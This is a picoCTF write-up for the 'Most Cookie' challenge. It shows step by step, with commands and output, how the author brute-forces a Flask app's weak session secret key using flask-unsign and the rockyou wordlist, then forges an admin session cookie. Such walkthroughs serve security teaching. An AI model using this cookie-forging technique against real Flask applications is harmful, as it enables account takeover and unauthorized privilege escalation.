picoCTF: Most Cookie

1. I first thought that the only thing I have to do is to change the first part of the cookie, since ininspector, we can see it's base64 encoded![](https://hackmd.io/_uploads/S1jo6QX3h.png) But if we only modify the first part, then we'll get an endless redirection![](https://hackmd.io/_uploads/Byxg1EXnn.png) 2. I went to look for the encoder of `flask cookie` and found [this tool](https://github.com/noraj/flask-session-cookie-manager). Though [it can be installed with pip](https://pypi.org/project/flask-session-cookie-manager/)(`pip install flask-session-cookie-manager`), the file will be installed in a folder, and it's located in the directory that you're working in. In my case, since I'm working in home directory, my file is located at `/home/kali/flask-session-cookie-manager/`. When using it, we'll need to change directory and run the file like this: ```shell ┌──(kali㉿kali)-[~] └─$ cd flask-session-cookie-manager ┌──(kali㉿kali)-[~/flask-session-cookie-manager] └─$ python3 flask_session_cookie_manager3.py decode -c "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.ZNWgGA.WyB3UkvYYXXQp-kudiDAPv-iNlE" b'{"very_auth":"blank"}' ``` 3. However, to generate a new cookie [requires a "secret key"](https://github.com/noraj/flask-session-cookie-manager#encode). I search with "brute-force flask secret key" online and found this tool: https://pypi.org/project/flask-unsign/. 4. When `pip install flask-unsign[wordlist]`, I got a warning message: *"WARNING: The script flask-unsign is installed in '/home/kali/.local/bin' which is not on PATH."*., so we have to add the directory to PATH with this command: `export PATH="/home/kali/.local/bin:$PATH"` and we can check whether it's added successfully using `echo $PATH` ```shell ┌──(kali㉿kali)-[~] └─$ export PATH="/home/kali/.local/bin:$PATH" ┌──(kali㉿kali)-[~] └─$ echo $PATH /home/kali/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games ``` 5. Initially, I use the default wordlist to brute force the secret key, but in vain. ```shell ┌──(kali㉿kali)-[~] └─$ flask-unsign --unsign --cookie "eyJ2ZXJ5X2F1dGgiOiJjaG9jb2xhdGUgY2hpcCJ9.ZNWpoQ.xgynm9v1lfHCKV6BkoAMo5dhVGE" [*] Session decodes to: {'very_auth': 'chocolate chip'} [*] No wordlist selected, falling back to default wordlist.. [*] Starting brute-forcer with 8 threads.. [*] Attempted (2176): -----BEGIN PRIVATE KEY-----ECR [*] Attempted (33664): Od(QyNieZgadnieszpiKeyge with- [*] Attempted (39040): b_9#y2L"F4Q8ziqwm6yr(qtr6)df6) [!] Failed to find secret key after 53994 attempts.le ``` But fortunately, I found [this site](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask#brute-force) suggests using `rockyou.txt`, and it worked! ```shell ┌──(kali㉿kali)-[~] └─$ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJ2ZXJ5X2F1dGgiOiJjaG9jb2xhdGUgY2hpcCJ9.ZNWpoQ.xgynm9v1lfHCKV6BkoAMo5dhVGE' --no-literal-eval [*] Session decodes to: {'very_auth': 'chocolate chip'} [*] Starting brute-forcer with 8 threads.. [+] Found secret key after 6272 attempts b'fortune' ``` 6. Since we know that `flag` function is triggered by `{"very_auth":"admin"}` when using `GET /display` (shown in `server.py`) , we have to encode `{"very_auth":"admin"}` with `fortune` ```shell ┌──(kali㉿kali)-[~/flask-session-cookie-manager] └─$ python3 flask_session_cookie_manager3.py encode -s 'fortune' -t '{"very_auth":"admin"}' eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.ZNWrYw.4IHyLGO9FOkd4fKyJPz8klzIyds ``` 7. Paste what we got and Forward it. ![](https://hackmd.io/_uploads/H1b0LNXh2.png) Here we go! ![](https://hackmd.io/_uploads/SJbA84mn2.png)